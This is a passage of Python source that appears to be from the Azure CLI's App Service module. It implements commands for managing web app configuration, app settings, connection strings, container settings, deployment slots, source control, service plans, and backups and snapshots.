resource_group_name, name, 'restart', slot) def get_site_configs(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot) def get_app_settings(cmd, resource_group_name, name, slot=None): result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot) client = web_client_factory(cmd.cli_ctx) slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names return _build_app_settings_output(result.properties, slot_app_setting_names) def get_connection_strings(cmd, resource_group_name, name, slot=None): result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot) client = web_client_factory(cmd.cli_ctx) slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \ .connection_string_names or [] result = [{'name': p, 'value': result.properties[p], 'slotSetting': p in slot_constr_names} for p in result.properties] return result def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None): client = web_client_factory(cmd.cli_ctx) result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_azure_storage_accounts', slot) slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \ .azure_storage_config_names or [] return [{'name': p, 'value': result.properties[p], 'slotSetting': p in slot_azure_storage_config_names} for p in result.properties] def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None): profiles = list_publish_profiles(cmd, resource_group_name, name, slot) url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP') setattr(webapp, 'ftpPublishingUrl', url) return webapp def _format_fx_version(custom_image_name, container_config_type=None): fx_version = custom_image_name.strip() fx_version_lower = fx_version.lower() # handles case of only spaces if fx_version: if container_config_type: fx_version = '{}|{}'.format(container_config_type, custom_image_name) elif not fx_version_lower.startswith('docker|'): fx_version = '{}|{}'.format('DOCKER', custom_image_name) else: fx_version = ' ' return fx_version def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None): fx_version = _format_fx_version(custom_image_name) web_app = get_webapp(cmd, resource_group_name, name, slot) linux_fx = fx_version if web_app.reserved else None windows_fx = fx_version if web_app.is_xenon else None return update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot) def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None): return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot) def _get_fx_version(cmd, resource_group_name, name, slot=None): site_config = get_site_configs(cmd, resource_group_name, name, slot) return site_config.linux_fx_version or site_config.windows_fx_version or '' def url_validator(url): try: result = urlparse(url) return all([result.scheme, result.netloc, result.path]) except ValueError: return False def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None): from base64 import b64decode linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot) if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]): raise CLIError("Cannot decode config that is not one of the" " following types: {}".format(','.join(MULTI_CONTAINER_TYPES))) return b64decode(linux_fx_version.split('|')[1].encode('utf-8')) def _get_linux_multicontainer_encoded_config_from_file(file_name): from base64 import b64encode config_file_bytes = None if url_validator(file_name): response = urlopen(file_name, context=_ssl_context()) config_file_bytes = response.read() else: with open(file_name, 'rb') as f: config_file_bytes = f.read() # Decode base64 encoded byte array into string return b64encode(config_file_bytes).decode('utf-8') # for any modifications to the non-optional parameters, adjust the reflection logic accordingly # in the method # pylint: disable=unused-argument def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None, windows_fx_version=None, pre_warmed_instance_count=None, php_version=None, python_version=None, net_framework_version=None, java_version=None, java_container=None, java_container_version=None, remote_debugging_enabled=None, web_sockets_enabled=None, always_on=None, auto_heal_enabled=None, use32_bit_worker_process=None, min_tls_version=None, http20_enabled=None, app_command_line=None, ftps_state=None, generic_configurations=None): configs = get_site_configs(cmd, resource_group_name, name, slot) if number_of_workers is not None: number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20) if linux_fx_version: if linux_fx_version.strip().lower().startswith('docker|'): update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"]) else: delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"]) if pre_warmed_instance_count is not None: pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count, min_val=0, max_val=20) import inspect frame = inspect.currentframe() bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on', 'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled'] int_flags = ['pre_warmed_instance_count', 'number_of_workers'] # note: getargvalues is used already in azure.cli.core.commands. # and no simple functional replacement for this deprecating method for 3.5 args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method for arg in args[3:]: if arg in int_flags and values[arg] is not None: values[arg] = validate_and_convert_to_int(arg, values[arg]) if arg != 'generic_configurations' and values.get(arg, None): setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true') generic_configurations = generic_configurations or [] result = {} for s in generic_configurations: try: result.update(get_json_object(s)) except CLIError: config_name, value = s.split('=', 1) result[config_name] = value for config_name, value in result.items(): setattr(configs, config_name, value) return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs) def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None): app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot) client = web_client_factory(cmd.cli_ctx) slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) is_slot_settings = False for setting_name in setting_names: app_settings.properties.pop(setting_name, None) if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names: slot_cfg_names.app_setting_names.remove(setting_name) is_slot_settings = True if is_slot_settings: client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_application_settings', app_settings.properties, slot, client) return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names) def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None): azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_azure_storage_accounts', slot) client = web_client_factory(cmd.cli_ctx) slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) is_slot_settings = False azure_storage_accounts.properties.pop(custom_id, None) if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names: slot_cfg_names.azure_storage_config_names.remove(custom_id) is_slot_settings = True if is_slot_settings: client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_azure_storage_accounts', azure_storage_accounts.properties, slot, client) return result.properties def _ssl_context(): if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'): try: return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6 except AttributeError: return ssl.SSLContext(ssl.PROTOCOL_TLSv1) return ssl.create_default_context() def _build_app_settings_output(app_settings, slot_cfg_names): slot_cfg_names = slot_cfg_names or [] return [{'name': p, 'value': app_settings[p], 'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)] def update_connection_strings(cmd, resource_group_name, name, connection_string_type, settings=None, slot=None, slot_settings=None): from azure.mgmt.web.models import ConnStringValueTypePair if not settings and not slot_settings: raise CLIError('Usage Error: --settings |--slot-settings') settings = settings or [] slot_settings = slot_settings or [] conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot) for name_value in settings + slot_settings: # split at the first '=', connection string should not have '=' in the name conn_string_name, value = name_value.split('=', 1) if value[0] in ["'", '"']: # strip away the quots used as separators value = value[1:-1] conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value, type=connection_string_type) client = web_client_factory(cmd.cli_ctx) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_connection_strings', conn_strings.properties, slot, client) if slot_settings: new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings] slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or [] slot_cfg_names.connection_string_names += new_slot_setting_names client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return result.properties def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None): conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot) client = web_client_factory(cmd.cli_ctx) slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) is_slot_settings = False for setting_name in setting_names: conn_strings.properties.pop(setting_name, None) if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names: slot_cfg_names.connection_string_names.remove(setting_name) is_slot_settings = True if is_slot_settings: client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_connection_strings', conn_strings.properties, slot, client) CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME', 'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"] APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD'] def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None, docker_custom_image_name=None, docker_registry_server_user=None, websites_enable_app_service_storage=None, docker_registry_server_password=None, multicontainer_config_type=None, multicontainer_config_file=None, slot=None): settings = [] if docker_registry_server_url is not None: settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url) if (not docker_registry_server_user and not docker_registry_server_password and docker_registry_server_url and '.azurecr.io' in docker_registry_server_url): logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...') parsed = urlparse(docker_registry_server_url) registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0] try: docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name) except Exception as ex: # pylint: disable=broad-except logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed if docker_registry_server_user is not None: settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user) if docker_registry_server_password is not None: settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password) if docker_custom_image_name is not None: _add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot) if websites_enable_app_service_storage: settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage) if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long update_app_settings(cmd, resource_group_name, name, settings, slot) settings = get_app_settings(cmd, resource_group_name, name, slot) if multicontainer_config_file and multicontainer_config_type: encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file) linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type) update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot) elif multicontainer_config_file or multicontainer_config_type: logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE') return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings, slot=slot)) def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None, docker_custom_image_name=None, docker_registry_server_user=None, docker_registry_server_password=None, slot=None): return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url, docker_custom_image_name, docker_registry_server_user, None, docker_registry_server_password, multicontainer_config_type=None, multicontainer_config_file=None, slot=slot) def _get_acr_cred(cli_ctx, registry_name): from azure.mgmt.containerregistry import ContainerRegistryManagementClient from azure.cli.core.commands.parameters import get_resources_in_subscription client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries') result = [item for item in result if item.name.lower() == registry_name] if not result or len(result) > 1: raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name)) resource_group_name = parse_resource_id(result[0].id)['resource_group'] registry = client.get(resource_group_name, registry_name) if registry.admin_user_enabled: # pylint: disable=no-member cred = client.list_credentials(resource_group_name, registry_name) return cred.username, cred.passwords[0].value raise CLIError("Failed to retrieve container registry credentials. Please either provide the " "credentials or run 'az acr update -n {} --admin-enabled true' to enable " "admin first.".format(registry_name)) def delete_container_settings(cmd, resource_group_name, name, slot=None): _delete_linux_fx_version(cmd, resource_group_name, name, slot) delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot) def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None): settings = get_app_settings(cmd, resource_group_name, name, slot) return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings, show_multicontainer_config, slot)) def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None): return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot) def _filter_for_container_settings(cmd, resource_group_name, name, settings, show_multicontainer_config=None, slot=None): result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES] fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip() if fx_version: added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME', 'value': fx_version} result.append(added_image_name) if show_multicontainer_config: decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot) decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED', 'value': decoded_value} result.append(decoded_image_name) return result # TODO: remove this when #3660(service tracking issue) is resolved def _mask_creds_related_appsettings(settings): for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]: settings[x] = None return settings def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None): HostNameBinding = cmd.get_models('HostNameBinding') client = web_client_factory(cmd.cli_ctx) webapp = client.web_apps.get(resource_group_name, webapp_name) if not webapp: raise CLIError("'{}' app doesn't exist".format(webapp_name)) binding = HostNameBinding(location=webapp.location, site_name=webapp.name) if slot is None: return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding) return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding, slot) def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None): client = web_client_factory(cmd.cli_ctx) if slot is None: return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname) return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname) def list_hostnames(cmd, resource_group_name, webapp_name, slot=None): result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_host_name_bindings', slot)) for r in result: r.name = r.name.split('/')[-1] return result def get_external_ip(cmd, resource_group_name, webapp_name): SslState = cmd.get_models('SslState') # logics here are ported from portal client = web_client_factory(cmd.cli_ctx) webapp = client.web_apps.get(resource_group_name, webapp_name) if not webapp: raise CLIError("'{}' app doesn't exist".format(webapp_name)) if webapp.hosting_environment_profile: address = client.app_service_environments.list_vips( resource_group_name, webapp.hosting_environment_profile.name) if address.internal_ip_address: ip_address = address.internal_ip_address else: vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None) ip_address = vip.virtual_ip if vip else address.service_ip_address else: ip_address = _resolve_hostname_through_dns(webapp.default_host_name) return {'ip': ip_address} def _resolve_hostname_through_dns(hostname): import socket return socket.gethostbyname(hostname) def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None): Site, SiteConfig = cmd.get_models('Site', 'SiteConfig') client = web_client_factory(cmd.cli_ctx) site = client.web_apps.get(resource_group_name, webapp) if not site: raise CLIError("'{}' app doesn't exist".format(webapp)) if 'functionapp' in site.kind: raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp)) location = site.location slot_def = Site(server_farm_id=site.server_farm_id, location=location) slot_def.site_config = SiteConfig() poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot) result = LongRunningOperation(cmd.cli_ctx)(poller) if configuration_source: update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source) result.name = result.name.split('/')[-1] return result def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None): Site = cmd.get_models('Site') client = web_client_factory(cmd.cli_ctx) site = client.web_apps.get(resource_group_name, name) if not site: raise CLIError("'{}' function app doesn't exist".format(name)) location = site.location slot_def = Site(server_farm_id=site.server_farm_id, location=location) poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot) result = LongRunningOperation(cmd.cli_ctx)(poller) if configuration_source: update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source) result.name = result.name.split('/')[-1] return result def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None): clone_from_prod = configuration_source.lower() == webapp.lower() site_config = get_site_configs(cmd, resource_group_name, webapp, None if clone_from_prod else configuration_source) _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config) # slot create doesn't clone over the app-settings and connection-strings, so we do it here # also make sure slot settings don't get propagated. slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp) src_slot = None if clone_from_prod else configuration_source app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'list_application_settings', src_slot) for a in slot_cfg_names.app_setting_names or []: app_settings.properties.pop(a, None) connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'list_connection_strings', src_slot) for a in slot_cfg_names.connection_string_names or []: connection_strings.properties.pop(a, None) _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_application_settings', app_settings.properties, slot, client) _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_connection_strings', connection_strings.properties, slot, client) def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals manual_integration=None, git_token=None, slot=None, cd_app_type=None, app_working_dir=None, nodejs_task_runner=None, python_framework=None, python_version=None, cd_account_create=None, cd_project_url=None, test=None, slot_swap=None, private_repo_username=None, private_repo_password=None): client = web_client_factory(cmd.cli_ctx) location = _get_location_from_webapp(client, resource_group_name, name) if cd_project_url: # Add default values cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type python_framework = 'Django' if python_framework is None else python_framework python_version = 'Python 3.5.3 x86' if python_version is None else python_version webapp_list = None if test is None else list_webapp(resource_group_name) vsts_provider = VstsContinuousDeliveryProvider() cd_app_type_details = { 'cd_app_type': cd_app_type, 'app_working_dir': app_working_dir, 'nodejs_task_runner': nodejs_task_runner, 'python_framework': python_framework, 'python_version': python_version } try: status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url, branch, git_token, slot_swap, cd_app_type_details, cd_project_url, cd_account_create, location, test, private_repo_username, private_repo_password, webapp_list) except RuntimeError as ex: raise CLIError(ex) logger.warning(status.status_message) return status non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework, python_version, cd_account_create, test, slot_swap] if any(non_vsts_params): raise CLIError('Following parameters are of no use when cd_project_url is None: ' + 'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' + 'python_version, cd_account_create, test, slot_swap') from azure.mgmt.web.models import SiteSourceControl, SourceControl if git_token: sc = SourceControl(location=location, source_control_name='GitHub', token=git_token) client.update_source_control('GitHub', sc) source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch, is_manual_integration=manual_integration, is_mercurial=(repository_type != 'git')) # SCC config can fail if previous commands caused SCMSite shutdown, so retry here. for i in range(5): try: poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_source_control', slot, source_control) return LongRunningOperation(cmd.cli_ctx)(poller) except Exception as ex: # pylint: disable=broad-except import re ex = ex_handler_factory(no_throw=True)(ex) # for non server errors(50x), just throw; otherwise retry 4 times if i == 4 or not re.findall(r'\(50\d\)', str(ex)): raise logger.warning('retrying %s/4', i + 1) time.sleep(5) # retry in a moment def update_git_token(cmd, git_token=None): ''' Update source control token cached in Azure app service. If no token is provided, the command will clean up existing token. ''' client = web_client_factory(cmd.cli_ctx) from azure.mgmt.web.models import SourceControl sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '') return client.update_source_control('GitHub', sc) def show_source_control(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot) def delete_source_control(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot) def enable_local_git(cmd, resource_group_name, name, slot=None): SiteConfigResource = cmd.get_models('SiteConfigResource') client = web_client_factory(cmd.cli_ctx) location = _get_location_from_webapp(client, resource_group_name, name) site_config = SiteConfigResource(location=location) site_config.scm_type = 'LocalGit' if slot is None: client.web_apps.create_or_update_configuration(resource_group_name, name, site_config) else: client.web_apps.create_or_update_configuration_slot(resource_group_name, name, site_config, slot) return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)} def sync_site_repo(cmd, resource_group_name, name, slot=None): try: return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot) except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here if ex.status_code not in [200, 204]: raise ex def list_app_service_plans(cmd, resource_group_name=None): client = web_client_factory(cmd.cli_ctx) if resource_group_name is None: plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites" else: plans = list(client.app_service_plans.list_by_resource_group(resource_group_name)) for plan in plans: # prune a few useless fields del plan.geo_region del plan.subscription return plans def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False, app_service_environment=None, sku='B1', number_of_workers=None, location=None, tags=None, no_wait=False): HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models( 'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan') sku = _normalize_sku(sku) _validate_asp_sku(app_service_environment, sku) if is_linux and hyper_v: raise CLIError('usage error: --is-linux | --hyper-v') client = web_client_factory(cmd.cli_ctx) if app_service_environment: if hyper_v: raise CLIError('Windows containers is not yet supported in app service environment') ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name) ase_def = HostingEnvironmentProfile(id=ase_id) ase_list = client.app_service_environments.list() ase_found = False for ase in ase_list: if ase.id.lower() == ase_id.lower(): location = ase.location ase_found = True break if not ase_found: raise CLIError("App service environment '{}' not found in subscription.".format(ase_id)) else: # Non-ASE ase_def = None if location is None: location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name) # the api is odd on parameter naming, have to live with it for now sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers) plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def, reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name, per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def) return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name, resource_group_name=resource_group_name, app_service_plan=plan_def) def update_app_service_plan(instance, sku=None, number_of_workers=None): if number_of_workers is None and sku is None: logger.warning('No update is done. Specify --sku and/or --number-of-workers.') sku_def = instance.sku if sku is not None: sku = _normalize_sku(sku) sku_def.tier = get_sku_name(sku) sku_def.name = sku if number_of_workers is not None: sku_def.capacity = number_of_workers instance.sku = sku_def return instance def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None): instance = update_app_service_plan(instance, sku, number_of_workers) if max_burst is not None: if not is_plan_elastic_premium(cmd, instance): raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans") max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20) instance.maximum_elastic_worker_count = max_burst if number_of_workers is not None: number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances', number_of_workers, min_val=0, max_val=20) return update_app_service_plan(instance, sku, number_of_workers) def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None): try: return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'get_backup_configuration', slot) except Exception: # pylint: disable=broad-except raise CLIError('Backup configuration not found') def list_backups(cmd, resource_group_name, webapp_name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups', slot) def create_backup(cmd, resource_group_name, webapp_name, storage_account_url, db_name=None, db_type=None, db_connection_string=None, backup_name=None, slot=None): BackupRequest = cmd.get_models('BackupRequest') client = web_client_factory(cmd.cli_ctx) if backup_name and backup_name.lower().endswith('.zip'): backup_name = backup_name[:-4] db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string) backup_request = BackupRequest(backup_request_name=backup_name, storage_account_url=storage_account_url, databases=db_setting) if slot: return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot) return client.web_apps.backup(resource_group_name, webapp_name, backup_request) def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None, frequency=None, keep_at_least_one_backup=None, retention_period_in_days=None, db_name=None, db_connection_string=None, db_type=None, backup_name=None, slot=None): DefaultErrorResponseException, BackupSchedule, BackupRequest = cmd.get_models( 'DefaultErrorResponseException', 'BackupSchedule', 'BackupRequest') configuration = None if backup_name and backup_name.lower().endswith('.zip'): backup_name = backup_name[:-4] if not backup_name: backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M')) try: configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'get_backup_configuration', slot) except DefaultErrorResponseException: # No configuration set yet if not all([storage_account_url, frequency, retention_period_in_days, keep_at_least_one_backup]): raise CLIError('No backup configuration found. A configuration must be created. ' + 'Usage: --container-url URL --frequency TIME --retention DAYS ' + '--retain-one TRUE/FALSE') # If arguments were not specified, use the values in the current backup schedule if storage_account_url is None: storage_account_url = configuration.storage_account_url if retention_period_in_days is None: retention_period_in_days = configuration.backup_schedule.retention_period_in_days if keep_at_least_one_backup is None: keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup else: keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true' if frequency: # Parse schedule frequency frequency_num, frequency_unit = _parse_frequency(cmd, frequency) else: frequency_num = configuration.backup_schedule.frequency_interval frequency_unit = configuration.backup_schedule.frequency_unit if configuration and configuration.databases: db = configuration.databases[0] db_type = db_type or db.database_type db_name = db_name or db.name db_connection_string = db_connection_string or db.connection_string db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string) backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name, keep_at_least_one_backup=keep_at_least_one_backup, retention_period_in_days=retention_period_in_days) backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule, enabled=True, storage_account_url=storage_account_url, databases=db_setting) return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration', slot, backup_request) def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name, db_name=None, db_type=None, db_connection_string=None, target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None): RestoreRequest = cmd.get_models('RestoreRequest') client = web_client_factory(cmd.cli_ctx) storage_blob_name = backup_name if not storage_blob_name.lower().endswith('.zip'): storage_blob_name += '.zip' db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string) restore_request = RestoreRequest(storage_account_url=storage_account_url, blob_name=storage_blob_name, overwrite=overwrite, site_name=target_name, databases=db_setting, ignore_conflicting_host_names=ignore_hostname_conflict) if slot: return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot) return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request) def list_snapshots(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots', slot) def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name source_resource_group=None, source_name=None, source_slot=None): from azure.cli.core.commands.client_factory import get_subscription_id SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest') client = web_client_factory(cmd.cli_ctx) recover_config = not restore_content_only if all([source_resource_group, source_name]): # Restore from source app to target app sub_id = get_subscription_id(cmd.cli_ctx) source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \ "/providers/Microsoft.Web/sites/" + source_name if source_slot: source_id = source_id + "/slots/" + source_slot source = SnapshotRecoverySource(id=source_id) request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source, recover_configuration=recover_config) if slot: return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot) return client.web_apps.restore_snapshot(resource_group_name, name, request) if any([source_resource_group, source_name]): raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used') # Overwrite app with its own snapshot request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config) if slot: return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot) return client.web_apps.restore_snapshot(resource_group_name, name, request) # pylint: disable=inconsistent-return-statements def _create_db_setting(cmd, db_name, db_type, db_connection_string): DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting') if all([db_name, db_type, db_connection_string]): return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)] if any([db_name, db_type, db_connection_string]): raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING') def _parse_frequency(cmd, frequency): FrequencyUnit = cmd.get_models('FrequencyUnit') unit_part = frequency.lower()[-1] if unit_part == 'd': frequency_unit = FrequencyUnit.day elif unit_part == 